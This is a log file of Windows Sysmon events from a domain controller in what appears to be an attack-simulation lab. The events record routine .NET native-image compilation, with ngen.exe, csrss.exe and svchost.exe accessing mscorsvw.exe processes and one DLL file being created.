{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7386,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.933\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010E81F0B00}\r\nTargetProcessId: 4532\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.933","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010E81F0B00}","TargetProcessId":"4532","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7387,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.933\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010E81F0B00}\r\nTargetProcessId: 4532\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.933","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010E81F0B00}","TargetProcessId":"4532","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7388,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:52.949\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1324-5F25-0000-0010E81F0B00}\r\nTargetProcessId: 4532\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:52.949","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1324-5F25-0000-0010E81F0B00}","TargetProcessId":"4532","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7389,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:00:53.105\r\nProcessGuid: {E2A3D6B1-1324-5F25-0000-0010E81F0B00}\r\nProcessId: 4532\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b4-0\\Microsoft.ActiveDirectory.TRLParser.dll\r\nCreationUtcTime: 2020-08-01 07:00:53.105","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:00:53.105","ProcessGuid":"{E2A3D6B1-1324-5F25-0000-0010E81F0B00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\11b4-0\\Microsoft.ActiveDirectory.TRLParser.dll","CreationUtcTime":"2020-08-01 07:00:53.105","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7390,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.121\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001055230B00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.121","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001055230B00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7391,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.121\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001055230B00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.121","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001055230B00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7392,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.136\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001055230B00}\r\nTargetProcessId: 4448\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.136","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001055230B00}","TargetProcessId":"4448","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7393,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.152\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.152","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001048260B00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:00:53","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7394,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:00:53.152\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1325-5F25-0000-001048260B00}\r\nTargetProcessId: 4288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:00:53.152","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1325-5F25-0000-001048260B00}","TargetProcessId":"4288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:00:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
